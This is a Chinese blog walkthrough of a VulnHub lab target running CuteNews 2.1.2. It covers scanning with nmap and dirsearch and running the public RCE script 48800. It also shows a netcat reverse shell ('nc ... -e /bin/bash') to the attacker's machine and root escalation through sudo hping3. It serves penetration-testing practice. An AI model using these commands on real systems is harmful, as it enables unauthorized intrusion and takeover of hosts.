靶场练习(1):CuteNews

已于 2024-09-11 15:10:34 修改
阅读量265 收藏 4
点赞数 4
分类专栏: vulnhub靶场练习 文章标签: 网络安全 linux
于 2024-09-09 17:37:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dcy1124/article/details/142063606
版权

靶机ip:172.16.33.9

突破

端口扫描

sudo nmap -p- 172.16.33.9 --open

结果如下:
在这里插入图片描述

特定端口扫描

sudo nmap -p22,80,88,110,995 -sV -A 172.16.33.9

结果如下:
在这里插入图片描述

针对80端口

对其进行路径扫描:

dirsearch -u http://172.16.33.9

对其进行文件扫描:

dirsearch -u http://172.16.33.9 -f -e txt,php,html.pdf

结果如下:
在这里插入图片描述
挨个进入尝试,最终在http://172.16.33.9/index.php页面发现管理系统名称及其版本号:cutenews2.1.2

在这里插入图片描述
运用searchsploit工具查询其是否有漏洞:

searchsploit cutenews

结果如下:
在这里插入图片描述
发现48800.py,其运用了远程代码执行漏洞,下载:

searchsploit -m 48800

查看代码,将其中的所有url部分改成实际情况,例如:

f"{ip}/index.php?mod=main&opt=personal"

结果如下:
在这里插入图片描述
按照代码中的提示运行脚本,突破成功:

python3 48800.py

按照提示输入URL :

Enter the URL> http://172.16.33.9

查看id,发现已进入指令模式:

id

结果如下:
在这里插入图片描述
通过netcat连接自身kali端主机:

nc <kali端本地ip> 1234 -e /bin/bash

做好侦听:

nc -nvlp 1234

结果如下:
在这里插入图片描述

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

或者

/usr/bin/script -qc /bin/bash /dev/null

通过sudo -l进行提权

查看当前用户能使用root权限运行哪些指令:

sudo -l

结果如下:

在这里插入图片描述

通过hping3进行提权:

hping3

查看id:

id

结果如下:
在这里插入图片描述
提权成功,打靶完成。

bebabong
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透靶场——Vulnhub:MinUv1
tlovejr的博客
04-12 2033
前言 今天正常看到了一个Vulnhub系列靶场,这个靶场主要是含有waf防火墙这个知识点,现在给大家简单的说一下 1、主机存活探测 arp-scan -l 发现存活主机ip地址为192.168.1.7 2、端口扫描 nmap -A -p- -T4 192.168.1.7 在这里就发现开放了80端口,也显示了Apache的版本为2.4.27,其他并没有什么有用的信息 3、web渗透 直接访问80端口 http://192.168.1.7/ 发现直接是apache的一个初始的服务页面,也没有什么有
vulnhub靶场,RED: 1
kukudeshuo的博客
02-11 4458
vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.197
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1955
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
【VulnHub靶场】——BEELZEBUB: 1
热门推荐
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
【Vulnhub靶场】Deathnote: 1
DG_s1mple
03-13 2543
环境准备 下载靶机后导入到vmware 题目并没有给出ip地址,需要我们自己探测 信息收集 kali使用arp-scan命令可以得到靶机的IP地址 靶机IP地址为:192.168.2.17 攻击机IP地址为:192.168.2.16 接下来我们使用nmap扫描一下靶机开放的端口 发现靶机只开放了ssh跟http服务 开始渗透 我们先访问它的网站,发现它跳转到了一个域名 我们修改hosts文件 这样就可以正常访问了 发现是一个wordpress站点,我们查找一下有用的信息 发现一个可能是密码的字符
vulnhub渗透测试靶场练习1
00勇士王子的博客
05-20 1017
一次完整的渗透测试靶场练习
靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1
qq_57976347的博客
02-21 1205
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.129 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 ht
【Vulnhub靶场】THALES: 1
DG_s1mple
03-17 3123
环境准备 下载靶机导入到vmware 信息收集 我们使用arp-scan命令查找靶机的IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开启的服务 发现靶机开放了tomcat和ssh,我们先访问他的tomcat 渗透开始 tomcat发现可以登录,我们尝试爆破一下 成功爆破出账号密码,我们返回网站登录 发现manager app页面可以上传文件 我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja
靶场练习:wordpress后台破解
zh的博客
10-11 1041
靶场地址:http://whalwl.icu:8090/ 解题准备:本题需要使用wpsan,kali自带 解题思路: 1、kali --> wpscan-->破解用户名 wpscan --url http://whalwl.icu:8090/ --enumerate u 2、拿到爆出的用户名,使用本题提供的字典爆密码,即可拿到后台账号密码 wpscan --url http://whalwl.icu:8090/ -U whalwlweb -P /root/dict.tx.
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
掌握 Linux 命令的艺术:深入解析与实用指南
hacker__的博客
09-06 1420
Linux操作系统是和windows操作系统是并列的关系。只不过只是两个操作系统的特性各有不同而已。
Linux 进程控制
2302_77289177的博客
09-08 1171
Linux 进程控制
高效诊断Linux性能问题
Tiger93的博客
09-08 472
诊断Linux性能问题
Linux> 基础IO
prodigy623的博客
09-06 1028
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
Linux之MySQL主从复制
最新发布
2302_79087378的博客
09-08 1409
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值